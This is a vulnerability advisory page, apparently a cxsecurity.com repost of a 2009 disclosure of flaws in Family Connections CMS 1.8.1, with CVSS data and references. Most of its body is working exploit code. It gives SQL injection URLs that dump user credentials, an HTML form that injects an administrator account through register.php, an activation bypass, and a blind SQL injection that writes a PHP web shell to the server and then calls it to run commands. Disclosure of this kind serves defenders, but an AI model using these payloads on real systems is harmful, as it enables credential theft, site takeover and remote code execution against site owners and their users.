Family Connections 1.8.1 Multiple Remote Vulnerabilities

2009-03-30 / 2009-03-31
Credit: Salvatore
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

******* Salvatore "drosophila" Fresta ******* [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx_at_gmail&#46;com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php ************************************************* [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User <html> <head> <title>Family Connection 1.8.1 Create Admin User Exploit</title> </head> <body> <p>This exploit creates an user with administrator privileges using follows information:<br> Username: root<br> Password: toor<br> <form action="http://localhost/fcms/register.php" method="POST"> <input type="hidden" name="username" value="blabla"> <input type="hidden" name="password" value="blabla"> <input type="hidden" name="email" value="blabla_at_blabla&#46;blabla"> <input type="hidden" name="fname" value="blabla"> <input type="hidden" name="lname" value="blabla"> <input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'root_at_owned&#46;com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'"> <input type="submit" name="submit" value="Exploit"> </form> </body> </html> To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1&code= [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\r\n" Host: www.site.com\r\n" Content-Type: application/x-www-form-urlencoded\r\n" Content-Length: 193\r\n\r\n" email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# To execute commands: http://www.site.com/path/rce.php?cmd=ls ************************************************* [+] Fix No fix. *************************************************

References:

http://www.securityfocus.com/bid/34297
http://www.securityfocus.com/archive/1/archive/1/502272/100/0/threaded
http://www.milw0rm.com/exploits/8319
http://www.familycms.com/blog/2009/03/fcms-182-released/
http://sourceforge.net/tracker/?func=detail&aid=2722736&group_id=189733&atid=930513
http://sourceforge.net/project/shownotes.php?release_id=672266
http://secunia.com/advisories/34503


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top